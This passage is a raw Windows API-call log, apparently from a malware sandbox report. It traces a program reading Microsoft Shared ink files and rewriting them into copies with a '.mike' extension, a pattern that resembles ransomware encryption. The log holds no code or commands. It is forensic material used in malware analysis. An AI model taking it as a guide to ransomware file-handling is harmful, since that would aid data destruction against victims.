hTemplateFile=0x0) returned 0x264 [0043.218] GetFileType (hFile=0x264) returned 0x1 [0043.218] GetFileType (hFile=0x264) returned 0x1 [0043.218] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x91220 [0043.218] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.218] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.218] GetFileType (hFile=0x264) returned 0x1 [0043.218] GetFileType (hFile=0x264) returned 0x1 [0043.218] ReadFile (in: hFile=0x264, lpBuffer=0x21f5420, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21f5420*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.219] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.219] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.219] GetFileType (hFile=0x264) returned 0x1 [0043.220] GetFileType (hFile=0x264) returned 0x1 [0043.220] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x93a20 [0043.220] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.220] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.220] GetFileType (hFile=0x264) returned 0x1 [0043.220] GetFileType (hFile=0x264) returned 0x1 [0043.220] ReadFile (in: hFile=0x264, lpBuffer=0x22023f8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22023f8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.221] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.221] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.221] GetFileType (hFile=0x264) returned 0x1 [0043.221] GetFileType (hFile=0x264) returned 0x1 [0043.221] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x96220 [0043.222] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.222] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.222] GetFileType (hFile=0x264) returned 0x1 [0043.223] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.457] WriteFile (in: hFile=0x264, lpBuffer=0x22e4330*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x22e4330*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0043.458] CloseHandle (hObject=0x264) returned 1 [0043.473] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.473] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.474] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.474] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", dwFileAttributes=0x80) returned 0 [0043.475] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.475] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.475] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0043.475] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3d38c20, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe3d38c20, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe41d56c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x186db0)) returned 1 [0043.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0043.475] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.475] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.475] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike")) returned 1 [0043.489] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe", lpFilePart=0x0) returned 0x4a [0043.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat", lpFilePart=0x0) returned 0x42 [0043.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat", lpFilePart=0x0) returned 0x3f [0043.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat", lpFilePart=0x0) returned 0x3f [0043.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat", lpFilePart=0x0) returned 0x41 [0043.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat", lpFilePart=0x0) returned 0x3e [0043.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat", lpFilePart=0x0) returned 0x3e [0043.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat", lpFilePart=0x0) returned 0x3f [0043.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat", lpFilePart=0x0) returned 0x3f [0043.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkDiv.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkDiv.dll", lpFilePart=0x0) returned 0x3d [0043.492] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll", lpFilePart=0x0) returned 0x3d [0043.492] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkWatson.exe", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkWatson.exe", lpFilePart=0x0) returned 0x40 [0043.492] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InputPersonalization.exe", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InputPersonalization.exe", lpFilePart=0x0) returned 0x4b [0043.492] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", lpFilePart=0x0) returned 0x3d [0043.492] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", lpFilePart=0x0) returned 0x3d [0043.492] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", lpFilePart=0x0) returned 0x3d [0043.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0043.492] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0043.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0043.493] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", lpFilePart=0x0) returned 0x3d [0043.493] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0043.494] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.494] GetFileType (hFile=0x264) returned 0x1 [0043.494] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0043.494] GetFileType (hFile=0x264) returned 0x1 [0043.494] CloseHandle (hObject=0x264) returned 1 [0043.494] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", lpFilePart=0x0) returned 0x3d [0043.494] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", lpFilePart=0x0) returned 0x3d [0043.494] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0043.494] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0043.494] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0043.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0043.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.495] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), fInfoLevelId=0x0, lpFileInformation=0x2105740 | out: lpFileInformation=0x2105740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91865215, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x91865215, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa20)) returned 1 [0043.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.495] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", lpFilePart=0x0) returned 0x3d [0043.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.495] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), fInfoLevelId=0x0, lpFileInformation=0x2105a30 | out: lpFileInformation=0x2105a30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91865215, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x91865215, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa20)) returned 1 [0043.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.495] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", lpFilePart=0x0) returned 0x3d [0043.495] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike", lpFilePart=0x0) returned 0x42 [0043.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.495] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.495] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", lpFilePart=0x0) returned 0x3d [0043.495] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", lpFilePart=0x0) returned 0x3d [0043.496] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", lpFilePart=0x0) returned 0x3d [0043.496] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike", lpFilePart=0x0) returned 0x42 [0043.496] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0043.496] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0043.496] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike", lpFilePart=0x0) returned 0x42 [0043.496] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.496] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.496] GetFileType (hFile=0x264) returned 0x1 [0043.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.496] GetFileType (hFile=0x264) returned 0x1 [0043.496] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0043.497] WriteFile (in: hFile=0x264, lpBuffer=0x2106784*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2106784*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0043.512] CloseHandle (hObject=0x264) returned 1 [0043.512] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0043.512] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), fInfoLevelId=0x0, lpFileInformation=0x21062c8 | out: lpFileInformation=0x21062c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91865215, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x91865215, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa20)) returned 1 [0043.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0043.512] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", lpFilePart=0x0) returned 0x3d [0043.512] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.512] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.513] GetFileType (hFile=0x264) returned 0x1 [0043.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.513] GetFileType (hFile=0x264) returned 0x1 [0043.513] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0043.513] ReadFile (in: hFile=0x264, lpBuffer=0x2107898, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2107898*, lpNumberOfBytesRead=0x2af0c8*=0xa20, lpOverlapped=0x0) returned 1 [0043.515] CloseHandle (hObject=0x264) returned 1 [0043.515] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike", lpFilePart=0x0) returned 0x42 [0043.515] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.516] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.516] GetFileType (hFile=0x264) returned 0x1 [0043.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.516] GetFileType (hFile=0x264) returned 0x1 [0043.516] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0043.516] WriteFile (in: hFile=0x264, lpBuffer=0x210cfa8*, nNumberOfBytesToWrite=0xa20, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x210cfa8*, lpNumberOfBytesWritten=0x2af0bc*=0xa20, lpOverlapped=0x0) returned 1 [0043.516] CloseHandle (hObject=0x264) returned 1 [0043.517] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft 